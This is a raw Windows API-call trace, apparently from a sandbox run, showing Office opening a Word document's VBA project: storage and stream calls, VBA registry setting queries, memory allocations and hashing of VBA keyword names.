[0029.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e7380, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0029.837] wcscpy_s (in: _Destination=0x78435a0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0029.837] CExposedDocFile::AddRef () returned 0x2 [0029.837] CExposedDocFile::OpenStorage () returned 0x0 [0029.837] CExposedDocFile::AddRef () returned 0x2 [0029.837] IMalloc:Alloc (This=0x7fefe015380, cb=0x84) returned 0x7835a40 [0029.837] wcscpy_s (in: _Destination=0x7835ab0, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0029.837] wcscpy_s (in: _Destination=0x2e6cf0, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0029.837] _ltow_s (in: _Value=0, _Buffer=0x2e6cfc, _BufferCount=0x3a, _Radix=16 | out: _Buffer="0") returned 0x0 [0029.837] CExposedDocFile::OpenStream () returned 0x80030002 [0029.838] IMalloc:Free (This=0x7fefe015380, pv=0x7835a40) [0029.838] longjmp () [0029.842] IMalloc:Alloc (This=0x7fefe015380, cb=0x84) returned 0x7835a40 [0029.842] wcscpy_s (in: _Destination=0x7835ab0, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0029.842] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0x776b150 [0029.842] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0x776b210 [0029.842] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0x78012a0 [0029.842] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0x78014f0 [0029.842] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0x7801740 [0029.842] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x766d140 [0029.842] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0x774b6c0 [0029.842] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x2e6cec, cchData=6 | out: lpLCData="1252") returned 5 [0029.843] atoi (_Str="1252") returned 1252 [0029.843] GetLocalTime (in: lpSystemTime=0x2e6ce0 | out: lpSystemTime=0x2e6ce0*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x20, wMilliseconds=0x2f3)) [0029.843] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7835b60 [0029.843] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fad0 [0029.843] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7835bf0 [0029.843] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x766d110 [0029.843] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7835c80 [0029.843] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fab0 [0029.843] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777faa0 [0029.843] strcpy_s (in: _Dst=0x2e6ac0, _DstSize=0xc8, _Src="Software\\Microsoft\\VBA\\" | out: _Dst="Software\\Microsoft\\VBA\\") returned 0x0 [0029.843] strcat_s (in: _Destination="Software\\Microsoft\\VBA\\", _SizeInBytes=0xc8, _Source="7.1\\Common" | out: _Destination="Software\\Microsoft\\VBA\\7.1\\Common") returned 0x0 [0029.843] RegCreateKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x7fee3aad500, lpdwDisposition=0x0 | out: phkResult=0x7fee3aad500*=0x9fc, lpdwDisposition=0x0) returned 0x0 [0029.843] RegQueryValueExA (in: hKey=0x9fc, lpValueName="RequireDeclaration", lpReserved=0x0, lpType=0x2e6b98, lpData=0x2e6b90, lpcbData=0x2e6b94*=0x4 | out: lpType=0x2e6b98*=0x0, lpData=0x2e6b90*=0x24, lpcbData=0x2e6b94*=0x4) returned 0x2 [0029.843] RegQueryValueExA (in: hKey=0x9fc, lpValueName="CompileOnDemand", lpReserved=0x0, lpType=0x2e6b98, lpData=0x2e6b90, lpcbData=0x2e6b94*=0x4 | out: lpType=0x2e6b98*=0x0, lpData=0x2e6b90*=0x0, lpcbData=0x2e6b94*=0x4) returned 0x2 [0029.843] RegQueryValueExA (in: hKey=0x9fc, lpValueName="NotifyUserBeforeStateLoss", lpReserved=0x0, lpType=0x2e6b98, lpData=0x2e6b90, lpcbData=0x2e6b94*=0x4 | out: lpType=0x2e6b98*=0x0, lpData=0x2e6b90*=0x1, lpcbData=0x2e6b94*=0x4) returned 0x2 [0029.843] RegQueryValueExA (in: hKey=0x9fc, lpValueName="BackGroundCompile", lpReserved=0x0, lpType=0x2e6b98, lpData=0x2e6b90, lpcbData=0x2e6b94*=0x4 | out: lpType=0x2e6b98*=0x0, lpData=0x2e6b90*=0x0, lpcbData=0x2e6b94*=0x4) returned 0x2 [0029.844] RegQueryValueExA (in: hKey=0x9fc, lpValueName="BreakOnAllErrors", lpReserved=0x0, lpType=0x2e6b98, lpData=0x2e6b90, lpcbData=0x2e6b94*=0x4 | out: lpType=0x2e6b98*=0x0, lpData=0x2e6b90*=0xff, lpcbData=0x2e6b94*=0x4) returned 0x2 [0029.844] RegQueryValueExA (in: hKey=0x9fc, lpValueName="BreakOnServerErrors", lpReserved=0x0, lpType=0x2e6b98, lpData=0x2e6b90, lpcbData=0x2e6b94*=0x4 | out: lpType=0x2e6b98*=0x0, lpData=0x2e6b90*=0x0, lpcbData=0x2e6b94*=0x4) returned 0x2 [0029.844] RegCloseKey (hKey=0x9fc) returned 0x0 [0029.844] IMalloc:Alloc (This=0x7fefe015380, cb=0xc0) returned 0x7659510 [0029.844] IMalloc:Alloc (This=0x7fefe015380, cb=0xc0) returned 0x76591d0 [0029.844] IMalloc:Alloc (This=0x7fefe015380, cb=0x1300) returned 0x78496a0 [0029.844] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2f80000 [0029.845] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x5380000 [0029.847] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0029.847] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x2fa0000 [0029.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0029.848] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3060000 [0029.849] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3090000 [0029.850] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3210000 [0029.851] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Intrinsics") returned 0x109464 [0029.851] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x4770000 [0029.852] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0029.852] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="") returned 0x10c0b3 [0029.852] CExposedDocFile::OpenStream () returned 0x0 [0029.852] IMalloc:Alloc (This=0x7fefe015380, cb=0x420) returned 0x784a9b0 [0029.852] CExposedStream::AddRef () returned 0x2 [0029.852] CExposedStream::Release () returned 0x1 [0029.852] CExposedStream::Read () returned 0x0 [0029.864] GetProcAddress (hModule=0x7fee3450000, lpProcName="MsoMultiByteToWideChar") returned 0x7fee345f200 [0029.864] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x67d0000 [0029.865] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x67e0000 [0029.866] CExposedDocFile::CreateStream () returned 0x0 [0029.866] IMalloc:Alloc (This=0x7fefe015380, cb=0x420) returned 0xb4077f0 [0029.866] CExposedStream::AddRef () returned 0x2 [0029.866] CExposedStream::Release () returned 0x1 [0029.866] CExposedStream::Release () returned 0x0 [0029.866] IMalloc:Free (This=0x7fefe015380, pv=0xb4077f0) [0029.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0029.866] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x6820000 [0029.867] VirtualAlloc (lpAddress=0x67e0000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x67e0000 [0029.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0029.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Access") returned 0x101d98 [0029.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddressOf") returned 0x10e252 [0029.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alias") returned 0x10bf6d [0029.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0029.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Any") returned 0x10747a [0029.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Append") returned 0x108f83 [0029.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Array") returned 0x109183 [0029.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0029.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Assert") returned 0x1096e9 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="B") returned 0x101059 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Base") returned 0x10afa9 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BF") returned 0x105ca5 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Binary") returned 0x1008a0 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CBool") returned 0x104c74 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CByte") returned 0x106d3c [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CCur") returned 0x108050 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDate") returned 0x108dc3 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDec") returned 0x10834a [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDbl") returned 0x1082e4 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDecl") returned 0x10a0b9 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ChDir") returned 0x10b2fb [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CInt") returned 0x109f65 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Circle") returned 0x103fd1 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLng") returned 0x10af63 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Compare") returned 0x10af82 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CSng") returned 0x10d4d2 [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CStr") returned 0x10d5bb [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir$") returned 0x10f7cc [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0029.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVar") returned 0x10e307 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVDate") returned 0x10cfd6 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVErr") returned 0x108902 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Currency") returned 0x10f106 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Database") returned 0x10eec7 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date$") returned 0x1031c7 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Debug") returned 0x10eaee [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Decimal") returned 0x1036dd [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Declare") returned 0x104a38 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefBool") returned 0x1091ad [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefByte") returned 0x10b275 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefCur") returned 0x10cc45 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDate") returned 0x10d2fc [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDec") returned 0x10cf3f [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDbl") returned 0x10ced9 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefInt") returned 0x10eb5a [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLng") returned 0x10fb58 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefObj") returned 0x10096b [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefSng") returned 0x102088 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefStr") returned 0x102171 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefVar") returned 0x102ebd [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir$") returned 0x106567 [0029.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Do") returned 0x105cf8 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DoEvents") returned 0x109634 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Double") returned 0x100d99 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Each") returned 0x10fe75 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Empty") returned 0x10f4f1 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EndIf") returned 0x1078bd [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Enum") returned 0x10465a [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Eqv") returned 0x108a4e [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Erase") returned 0x1080da [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error$") returned 0x10cf60 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Event") returned 0x10ac4b [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Explicit") returned 0x10edcb [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Fix") returned 0x108e81 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format$") returned 0x10efc7 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FreeFile") returned 0x10483a [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Friend") returned 0x10bd1c [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Get") returned 0x109342 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Global") returned 0x10f88f [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Go") returned 0x105d67 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoSub") returned 0x10b425 [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0029.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Imp") returned 0x109f18 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Implements") returned 0x10a988 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="In") returned 0x105db0 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input$") returned 0x107767 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB$") returned 0x100c59 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStr") returned 0x10120e [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStrB") returned 0x10c2fb [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBound") returned 0x101e0b [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Let") returned 0x10adff [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lib") returned 0x10ae81 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Like") returned 0x1091f3 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Line") returned 0x109262 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LINEINPUT") returned 0x1008f1 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Load") returned 0x10b096 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Local") returned 0x10353f [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lock") returned 0x10b0e7 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loop") returned 0x10b2a8 [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LSet") returned 0x10c69e [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Me") returned 0x105e3b [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0029.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB$") returned 0x102a70 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module") returned 0x101ee1 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Name") returned 0x10f2f0 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Option") returned 0x10f982 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Optional") returned 0x10675a [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Output") returned 0x10f959 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ParamArray") returned 0x105941 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Preserve") returned 0x10a5fc [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Print") returned 0x10f00d [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Property") returned 0x10d2f6 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PSet") returned 0x10dd55 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Put") returned 0x10c5b3 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RaiseEvent") returned 0x10274a [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Random") returned 0x10f428 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Randomize") returned 0x10ab02 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Read") returned 0x101d0f [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rem") returned 0x10ce0e [0029.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RGB") returned 0x10ce4d [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RSet") returned 0x106891 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Scale") returned 0x10e596 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Seek") returned 0x10e387 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sgn") returned 0x10d3b2 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shared") returned 0x10479e [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Spc") returned 0x10d4f4 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Static") returned 0x1029c6 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stop") returned 0x1034f6 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="StrComp") returned 0x10274d [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String$") returned 0x10c31c [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tab") returned 0x10d821 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Type") returned 0x100007 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TypeOf") returned 0x101832 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unload") returned 0x104e44 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unlock") returned 0x104e95 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Until") returned 0x10ecec [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Variant") returned 0x108738 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wend") returned 0x1035a7 [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0029.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Width") returned 0x104e68 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WithEvents") returned 0x10f2eb [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Xor") returned 0x10ef9b [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Const") returned 0x10f8c9 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Else") returned 0x1050dd 